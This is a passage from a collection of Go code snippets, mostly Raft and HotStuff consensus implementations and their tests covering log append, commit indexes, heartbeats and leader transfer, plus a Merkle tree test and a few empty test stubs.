{\n\tselect {\n\tcase e := <-f.Received:\n\t\trequire.Equal(t, expected, e)\n\tcase <-time.After(time.Second):\n\t\trequire.FailNow(t, \"Timed out waiting for entry\")\n\t}\n}", "func TestCommit(t *testing.T) {\n\tconst n = 4\n\tctrl := gomock.NewController(t)\n\ths := New()\n\tkeys := testutil.GenerateKeys(t, n, testutil.GenerateECDSAKey)\n\tbl := testutil.CreateBuilders(t, ctrl, n, keys...)\n\tacceptor := mocks.NewMockAcceptor(ctrl)\n\texecutor := mocks.NewMockExecutor(ctrl)\n\tsynchronizer := synchronizer.New(testutil.FixedTimeout(1000))\n\tcfg, replicas := testutil.CreateMockConfigWithReplicas(t, ctrl, n, keys...)\n\tbl[0].Register(hs, cfg, acceptor, executor, synchronizer, leaderrotation.NewFixed(2))\n\thl := bl.Build()\n\tsigners := hl.Signers()\n\n\t// create the needed blocks and QCs\n\tgenesisQC := hotstuff.NewQuorumCert(nil, 0, hotstuff.GetGenesis().Hash())\n\tb1 := testutil.NewProposeMsg(hotstuff.GetGenesis().Hash(), genesisQC, \"1\", 1, 2)\n\tb1QC := testutil.CreateQC(t, b1.Block, signers)\n\tb2 := testutil.NewProposeMsg(b1.Block.Hash(), b1QC, \"2\", 2, 2)\n\tb2QC := testutil.CreateQC(t, b2.Block, signers)\n\tb3 := testutil.NewProposeMsg(b2.Block.Hash(), b2QC, \"3\", 3, 2)\n\tb3QC := testutil.CreateQC(t, b3.Block, signers)\n\tb4 := testutil.NewProposeMsg(b3.Block.Hash(), b3QC, \"4\", 4, 2)\n\n\t// the second replica will be the leader, so we expect it to receive votes\n\treplicas[1].EXPECT().Vote(gomock.Any()).AnyTimes()\n\treplicas[1].EXPECT().NewView(gomock.Any()).AnyTimes()\n\n\t// executor will check that the correct command is executed\n\texecutor.EXPECT().Exec(gomock.Any()).Do(func(arg interface{}) {\n\t\tif arg.(hotstuff.Command) != b1.Block.Command() {\n\t\t\tt.Errorf(\"Wrong command executed: got: %s, want: %s\", arg, b1.Block.Command())\n\t\t}\n\t})\n\n\t// acceptor expects to receive the commands in order\n\tgomock.InOrder(\n\t\tacceptor.EXPECT().Proposed(gomock.Any()),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"1\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"1\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"2\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"2\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"3\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"3\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"4\")).Return(true),\n\t)\n\n\ths.OnPropose(b1)\n\ths.OnPropose(b2)\n\ths.OnPropose(b3)\n\ths.OnPropose(b4)\n}", "func TestCommitMissingPrewrite4a(t *testing.T) {\n}", "func (rf *Raft) AppendEntry(args AppendEntryArgs, reply *AppendEntryReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Success = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\trf.state = FOLLOWER\n\trf.currentTerm = args.Term\n\trf.votedFor = -1\n\treply.Term = args.Term\n\n\tif args.PrevLogIndex >= 0 &&\n\t\t(len(rf.log)-1 < args.PrevLogIndex ||\n\t\t\trf.log[args.PrevLogIndex].Term != args.PrevLogTerm) {\n\t\treply.Success = false\n\t\treply.CommitIndex = min(len(rf.log)-1, args.PrevLogIndex)\n\t\tfor reply.CommitIndex >= 0 &&\n\t\t\trf.log[reply.CommitIndex].Term != args.PrevLogTerm {\n\t\t\treply.CommitIndex--\n\t\t}\n\t} else if args.Entries != nil {\n\t\trf.log = append(rf.log[:args.PrevLogIndex+1], args.Entries...)\n\t\tif len(rf.log) > args.LeaderCommit {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t//TODO:commitlog\n\t\t\tgo rf.CommitLog()\n\t\t}\n\t\treply.CommitIndex = len(rf.log) - 1\n\t\treply.Success = true\n\t} else {\n\t\tif len(rf.log) > args.LeaderCommit {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t//TODO:commitlog\n\t\t\tgo rf.CommitLog()\n\t\t}\n\t\treply.CommitIndex = args.PrevLogIndex\n\t\treply.Success = true\n\t}\n\trf.persist()\n\trf.timer.Reset(properTimeDuration(rf.state))\n}", "func TestOneEntry(t *testing.T) {\n\tm, err := NewMerkleTree()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tvar commit [32]byte\n\tvar expect [32]byte\n\n\tkey := \"key\"\n\tval := []byte(\"value\")\n\tindex := staticVRFKey.Compute([]byte(key))\n\tif err := m.Set(index, key, val); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tm.recomputeHash()\n\n\t// Check empty node hash\n\th := sha3.NewShake128()\n\th.Write([]byte{EmptyBranchIdentifier})\n\th.Write(m.nonce)\n\th.Write(utils.ToBytes([]bool{true}))\n\th.Write(utils.UInt32ToBytes(1))\n\th.Read(expect[:])\n\tif !bytes.Equal(m.root.rightHash, expect[:]) {\n\t\tt.Error(\"Wrong righ hash!\",\n\t\t\t\"expected\", expect,\n\t\t\t\"get\", m.root.rightHash)\n\t}\n\n\tr := m.Get(index)\n\tif r.Leaf.Value == nil {\n\t\tt.Error(\"Cannot find value of key:\", key)\n\t\treturn\n\t}\n\tv := r.Leaf.Value\n\tif !bytes.Equal(v, val) {\n\t\tt.Errorf(\"Value mismatch %v / %v\", v, val)\n\t}\n\n\t// Check leaf node hash\n\th.Reset()\n\th.Write(r.Leaf.Commitment.Salt)\n\th.Write([]byte(key))\n\th.Write(val)\n\th.Read(commit[:])\n\n\th.Reset()\n\th.Write([]byte{LeafIdentifier})\n\th.Write(m.nonce)\n\th.Write(index)\n\th.Write(utils.UInt32ToBytes(1))\n\th.Write(commit[:])\n\th.Read(expect[:])\n\n\tif !bytes.Equal(m.root.leftHash, expect[:]) {\n\t\tt.Error(\"Wrong left hash!\",\n\t\t\t\"expected\", expect,\n\t\t\t\"get\", m.root.leftHash)\n\t}\n\n\tr = m.Get([]byte(\"abc\"))\n\tif r.Leaf.Value != nil {\n\t\tt.Error(\"Invalid look-up operation:\", key)\n\t\treturn\n\t}\n}", "func (sm *State_Machine) FollTesting(t *testing.T) {\n\n\t//Creating a follower which has just joined the cluster.\n\tvar follTC TestCases\n\tfollTC.t = t\n\tvar cmdReq = []string{\"read test\", \"read cs733\"}\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:1|votedFor:0|commitInd:0|>>>\n\n\t/*Sending an apped request*/\n\tfollTC.req = Append{Data: []byte(cmdReq[0])}\n\tfollTC.respExp = Commit{Data: []byte(\"5000\"), Err: []byte(\"I'm not leader\")}\n\tsm.ClientCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending appendEntry request*/\n\t//Suppose leader and follower are at same Term.\n\tentries1 := Logg{Logg: []MyLogg{{1, \"read test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 2, Logg: entries1, LeaderCom: 0}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting LogStore\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:1|votedFor:0|commitInd:0|lastApp:0|>>>\n\n\t//Sending Multiple entries\n\tentries2 := Logg{Logg: []MyLogg{{1, \"read test\"}, {1, \"read cloud\"}, {1, \"read cs733\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 1, Logg: entries2, LeaderCom: 1}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:3|votedFor:0|commitInd:1|lastApp:0|>>>\n\n\t//Suppose leader has higher Term than follower.\n\tentries3 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 2, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 1, Logg: entries3, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:4|votedFor:0|commitInd:2|lastApp:0|>>>\n\n\t//Suppose follower has higher Term than leader.\n\tentries4 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 2, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex does not matches.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 5, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex matches, but entry doesnt.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Everything is ok, but no entry.\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, LeaderCom: 2}\n\tfollTC.respExp = Alarm{T: 200}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending vote request*/\n\t//sending vote request with lower Term.\n\tfollTC.req = VoteReq{Term: 1, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:3|LoggIng:4|votedFor:1|commitInd:2|lastApp:0|>>>\n\n\t//checking against duplicate vote rquest\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending timeout*/\n\tfollTC.req = Timeout{}\n\tfollTC.respExp = Alarm{T: 150}\n\tsm.TimeoutCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Send{PeerId: 0, Event: VoteReq{Term: 4, CandId: 1000, PreLoggInd: 3, PreLoggTerm: 2}} //also the vote request\n\tfollTC.expect()\n\n}", "func (rf *Raft) updateCommit(newCommitIndex int) {\n\n\tif newCommitIndex < rf.commitIndex {\n\t\tpanic(fmt.Sprintf(\"Server %v: new commit index %v is lower than previous one %v\\n\", rf.me, newCommitIndex, rf.commitIndex))\n\t}\n\n\trf.commitIndex = newCommitIndex\n\trf.debug(\"New commit index: %v\\n\", rf.commitIndex)\n\n\tif rf.commitIndex > rf.lastEntryIndex() {\n\t\tpanic(fmt.Sprintf(\"Server %v: new commit index is bigger than log size (%v, %v)\\n\", rf.me, rf.commitIndex, rf.lastEntryIndex()))\n\t}\n}", "func (s *raftState) checkLeaderCommit() bool {\n\tmatches := make([]int, 0, len(s.MatchIndex))\n\tfor _, x := range s.MatchIndex {\n\t\tmatches = append(matches, x)\n\t}\n\tsort.Sort(sort.Reverse(sort.IntSlice(matches)))\n\tnewC := matches[s.majority()-1]\n\tif newC > s.CommitIndex {\n\t\ts.commitUntil(newC)\n\t\tglog.V(utils.VDebug).Infof(\"%s Leader update commitIndex: %d\", s.String(), newC)\n\t\treturn true\n\t}\n\treturn false\n}", "func TestHandleHeartbeat(t *testing.T) {\n\tcommit := uint64(2)\n\ttests := []struct {\n\t\tm pb.Message\n\t\twCommit uint64\n\t}{\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit + 1}, commit + 1},\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit - 1}, commit}, // do not decrease commit\n\t}\n\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 2}, {Index: 3, Term: 3}})\n\t\tsm := newTestRaft(1, []uint64{1, 2}, 5, 1, storage)\n\t\tsm.becomeFollower(2, 2)\n\t\tsm.raftLog.commitTo(commit)\n\t\tsm.handleHeartbeat(tt.m)\n\t\tif sm.raftLog.committed != tt.wCommit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, sm.raftLog.committed, tt.wCommit)\n\t\t}\n\t\tm := sm.readMessages()\n\t\tif len(m) != 1 {\n\t\t\tt.Fatalf(\"#%d: msg = nil, want 1\", i)\n\t\t}\n\t\tif m[0].Type != pb.MsgHeartbeatResp {\n\t\t\tt.Errorf(\"#%d: type = %v, want MsgHeartbeatResp\", i, m[0].Type)\n\t\t}\n\t}\n}", "func (m *MockFullNode) VerifyEntry(arg0, arg1 *types0.BeaconEntry, arg2 abi.ChainEpoch) bool {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"VerifyEntry\", arg0, arg1, arg2)\n\tret0, _ := ret[0].(bool)\n\treturn ret0\n}", "func TestLeaderTransferBack(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\t// Transfer leadership back to self.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (s *raftServer) handleFollowers(followers []int, nextIndex *utils.SyncIntIntMap, matchIndex *utils.SyncIntIntMap, aeToken *utils.SyncIntIntMap) {\n\tfor s.State() == LEADER {\n\t\tfor _, f := range followers {\n\t\t\tlastIndex := s.localLog.TailIndex()\n\t\t\tn, ok := nextIndex.Get(f)\n\t\t\tif !ok {\n\t\t\t\tpanic(\"nextIndex not found for follower \" + strconv.Itoa(f))\n\t\t\t}\n\n\t\t\tunlocked, ok := aeToken.Get(f)\n\n\t\t\tif !ok {\n\t\t\t\tpanic(\"aeToken not found for follower \" + strconv.Itoa(f))\n\t\t\t}\n\n\t\t\tif lastIndex != 0 && lastIndex >= n && unlocked == 1 {\n\t\t\t\taeToken.Set(f, 0)\n\t\t\t\t// send a new AppendEntry\n\t\t\t\tprevIndex := n - 1\n\t\t\t\tvar prevTerm int64 = 0\n\t\t\t\t// n = 0 when we add first entry to the log\n\t\t\t\tif prevIndex > 0 {\n\t\t\t\t\tprevTerm = s.localLog.Get(prevIndex).Term\n\t\t\t\t}\n\t\t\t\tae := &AppendEntry{Term: s.Term(), LeaderId: s.server.Pid(), PrevLogIndex: prevIndex, PrevLogTerm: prevTerm}\n\t\t\t\tae.LeaderCommit = s.commitIndex.Get()\n\t\t\t\tae.Entry = *s.localLog.Get(n)\n\t\t\t\ts.writeToLog(\"Replicating entry \" + strconv.FormatInt(n, 10))\n\t\t\t\ts.server.Outbox() <- &cluster.Envelope{Pid: f, Msg: ae}\n\t\t\t}\n\t\t}\n\t\ttime.Sleep(NICE * time.Millisecond)\n\t}\n}", "func testCommit(t *testing.T, myApp app.BaseApp, h int64) []byte {\n\t// Commit first block, make sure non-nil hash\n\theader := abci.Header{Height: h}\n\tmyApp.BeginBlock(abci.RequestBeginBlock{Header: header})\n\tmyApp.EndBlock(abci.RequestEndBlock{})\n\tcres := myApp.Commit()\n\thash := cres.Data\n\tassert.NotEmpty(t, hash)\n\treturn hash\n}", "func (r *Raft) runLeader() {\n\tstate := leaderState{\n\t\tcommitCh: make(chan *DeferLog, 128),\n\t\treplicationState: make(map[string]*followerReplication),\n\t}\n\tdefer state.Release()\n\n\t// Initialize inflight tracker\n\tstate.inflight = NewInflight(state.commitCh)\n\n\tr.peerLock.Lock()\n\t// Start a replication routine for each peer\n\tfor _, peer := range r.peers {\n\t\tr.startReplication(&state, peer)\n\t}\n\tr.peerLock.Unlock()\n\n\t// seal leadership\n\tgo r.leaderNoop()\n\n\ttransition := false\n\tfor !transition {\n\t\tselect {\n\t\tcase applyLog := <-r.applyCh:\n\t\t\t// Prepare log\n\t\t\tapplyLog.log.Index = r.getLastLogIndex() + 1\n\t\t\tapplyLog.log.Term = r.getCurrentTerm()\n\t\t\t// Write the log entry locally\n\t\t\tif err := r.logs.StoreLog(&applyLog.log); err != nil {\n\t\t\t\tr.logE.Printf(\"Failed to commit log: %w\", err)\n\t\t\t\tapplyLog.response = err\n\t\t\t\tapplyLog.Response()\n\t\t\t\tr.setState(Follower)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Add this to the inflight logs\n\t\t\tstate.inflight.Start(applyLog, r.quorumSize())\n\t\t\tstate.inflight.Commit(applyLog.log.Index)\n\t\t\t// Update the last log since it's on disk now\n\t\t\tr.setLastLogIndex(applyLog.log.Index)\n\n\t\t\t// Notify the replicators of the new log\n\t\t\tfor _, f := range state.replicationState {\n\t\t\t\tasyncNotifyCh(f.triggerCh)\n\t\t\t}\n\n\t\tcase commitLog := <-state.commitCh:\n\t\t\t// Increment the commit index\n\t\t\tidx := commitLog.log.Index\n\t\t\tr.setCommitIndex(idx)\n\n\t\t\t// Perform leader-specific processing\n\t\t\ttransition = r.leaderProcessLog(&state, &commitLog.log)\n\n\t\t\t// Trigger applying logs locally\n\t\t\tr.commitCh <- commitTuple{idx, commitLog}\n\n\t\tcase rpc := <-r.rpcCh:\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\ttransition = r.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\ttransition = r.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"Leader state, got unexpected command: %#v\",\n\t\t\t\t\trpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (s *Service) onOffsetCommit(brokerId int32, duration time.Duration) {\n\n\t// todo:\n\t// if the commit took too long, don't count it in 'commits' but add it to the histogram?\n\t// and how do we want to handle cases where we get an error??\n\t// should we have another metric that tells us about failed commits? or a label on the counter?\n\tbrokerIdStr := fmt.Sprintf(\"%v\", brokerId)\n\ts.endToEndCommitLatency.WithLabelValues(brokerIdStr).Observe(duration.Seconds())\n\n\tif duration > s.config.Consumer.CommitSla {\n\t\treturn\n\t}\n\n\ts.endToEndCommits.Inc()\n}", "func (r *Raft) AppendToLog_Follower(request AppendEntriesReq) {\n\tterm := request.term\n\tcmd := request.entries\n\tindex := request.prevLogIndex + 1\n\tlogVal := LogVal{term, cmd, 0} //make object for log's value field\n\n\tif len(r.myLog) == index {\n\t\tr.myLog = append(r.myLog, logVal) //when trying to add a new entry\n\t} else {\n\t\tr.myLog[index] = logVal //overwriting in case of log repair\n\t\t//fmt.Println(\"Overwiriting!!\")\n\t}\n\t//fmt.Println(r.myId(), \"Append to log\", string(cmd))\n\t//modify metadata after appending\n\t//r.myMetaData.lastLogIndex = r.myMetaData.lastLogIndex + 1\n\t//r.myMetaData.prevLogIndex = r.myMetaData.lastLogIndex\n\t//\tif len(r.myLog) == 1 {\n\t//\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1\n\t//\t} else if len(r.myLog) > 1 {\n\t//\t\tr.myMetaData.prevLogTerm = r.myLog[r.myMetaData.prevLogIndex].Term\n\t//\t}\n\n\t//Changed on 4th april, above is wrong in case of overwriting of log\n\tr.myMetaData.lastLogIndex = index\n\tr.myMetaData.prevLogIndex = index - 1\n\tif index == 0 {\n\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1 //or simple -1\n\t} else if index >= 1 {\n\t\tr.myMetaData.prevLogTerm = r.myLog[index-1].Term\n\t}\n\n\t//Update commit index\n\tleaderCI := float64(request.leaderCommitIndex)\n\tmyLI := float64(r.myMetaData.lastLogIndex)\n\tif request.leaderCommitIndex > r.myMetaData.commitIndex {\n\t\tif myLI == -1 { //REDUNDANT since Append to log will make sure it is never -1,also must not copy higher CI if self LI is -1\n\t\t\tr.myMetaData.commitIndex = int(leaderCI)\n\t\t} else {\n\t\t\tr.myMetaData.commitIndex = int(math.Min(leaderCI, myLI))\n\t\t}\n\t}\n\t//fmt.Println(r.myId(), \"My CI is:\", r.myMetaData.commitIndex)\n\tr.WriteLogToDisk()\n}", "func TestRecommitKey4A(t *testing.T) {\n}", "func TestEmptyCommit4A(t *testing.T) {\n}", "func TestNewCommits(t *testing.T) {\n\tos.Remove(\"/tmp/commits.log\")\n\n\tc, err := New(\"/tmp/commits.log\")\n\tcheck(err)\n\n\tcheck(c.Add(\"foo\"))\n\tcheck(c.Add(\"bar\"))\n\tcheck(c.Add(\"baz\"))\n\n\tcheck(c.Close())\n\tcheck(c.Open())\n\n\tassert.Equal(t, 3, c.Length())\n\tassert.Equal(t, true, c.Has(\"foo\"))\n\tassert.Equal(t, true, c.Has(\"bar\"))\n\tassert.Equal(t, true, c.Has(\"baz\"))\n\tassert.Equal(t, false, c.Has(\"something\"))\n}", "func TestLogNewLog(t *testing.T) {\n\tpath := getLogPath()\n\tlog := NewLog()\n\tlog.AddCommandType(&TestCommand1{})\n\tlog.AddCommandType(&TestCommand2{})\n\tif err := log.Open(path); err != nil {\n\t\tt.Fatalf(\"Unable to open log: %v\", err)\n\t}\n\tdefer log.Close()\n\tdefer os.Remove(path)\n\t\n\tif err := log.Append(NewLogEntry(log, 1, 1, &TestCommand1{\"foo\", 20})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\tif err := log.Append(NewLogEntry(log, 2, 1, &TestCommand2{100})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\tif err := log.Append(NewLogEntry(log, 3, 2, &TestCommand1{\"bar\", 0})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\t\n\t// Partial commit.\n\tif err := log.SetCommitIndex(2); err != nil {\n\t\tt.Fatalf(\"Unable to partially commit: %v\", err)\n\t}\n\texpected := \n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\"\n\tactual, _ := ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n\n\t// Full commit.\n\tif err := log.SetCommitIndex(3); err != nil {\n\t\tt.Fatalf(\"Unable to commit: %v\", err)\n\t}\n\texpected = \n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`6ac5807c 0000000000000003 0000000000000002 cmd_1 {\"val\":\"bar\",\"i\":0}`+\"\\n\"\n\tactual, _ = ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n}", "func (b *stateHistoryBackend) AmendEntry(entry *statestream.StreamEntry, oldTimestamp time.Time) error {\n\tif b.initialSet {\n\t\tb.pendingEntry = entry\n\t}\n\n\treturn nil\n}", "func (handler *RuleHandler) FollowerOnAppendEntries(msg iface.MsgAppendEntries, log iface.RaftLog, status iface.Status) []interface{} {\n\tactions := make([]interface{}, 0) // list of actions created\n\t// since we are hearing from the leader, reset timeout\n\tactions = append(actions, iface.ActionResetTimer{\n\t\tHalfTime: false,\n\t})\n\tactions = append(actions, iface.ActionSetLeaderLastHeard{\n\t\tInstant: time.Now(),\n\t})\n\n\t// maybe we are outdated\n\tif msg.Term > status.CurrentTerm() {\n\t\tactions = append(actions, iface.ActionSetCurrentTerm{\n\t\t\tNewCurrentTerm: msg.Term,\n\t\t})\n\t}\n\n\tprevEntry, _ := log.Get(msg.PrevLogIndex)\n\n\t// leader is outdated ?\n\tif msg.Term < status.CurrentTerm() {\n\t\tactions = append(actions, iface.ReplyAppendEntries{\n\t\t\tAddress: status.NodeAddress(),\n\t\t\tSuccess: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// I dont have previous log entry (but should)\n\tif prevEntry == nil && msg.PrevLogIndex != -1 {\n\t\tactions = append(actions, iface.ReplyAppendEntries{\n\t\t\tAddress: status.NodeAddress(),\n\t\t\tSuccess: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// I have previous log entry, but it does not match\n\tif prevEntry != nil && prevEntry.Term != msg.PrevLogTerm {\n\t\tactions = append(actions, iface.ReplyAppendEntries{\n\t\t\tAddress: status.NodeAddress(),\n\t\t\tSuccess: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// all is ok. accept new entries\n\tactions = append(actions, iface.ReplyAppendEntries{\n\t\tAddress: status.NodeAddress(),\n\t\tSuccess: true,\n\t\tTerm: status.CurrentTerm(),\n\t})\n\n\t// if there is anything to append, do it\n\tif len(msg.Entries) > 0 {\n\t\t// delete all entries in log after PrevLogIndex\n\t\tactions = append(actions, iface.ActionDeleteLog{\n\t\t\tCount: log.LastIndex() - msg.PrevLogIndex,\n\t\t})\n\n\t\t// take care ! Maybe we are removing an entry\n\t\t// containing our current cluster configuration.\n\t\t// In this case, revert to previous cluster\n\t\t// configuration\n\t\tcontainsClusterChange := false\n\t\tstabilized := false\n\t\tclusterChangeIndex := status.ClusterChangeIndex()\n\t\tclusterChangeTerm := status.ClusterChangeTerm()\n\t\tcluster := append(status.PeerAddresses(), status.NodeAddress())\n\t\tfor 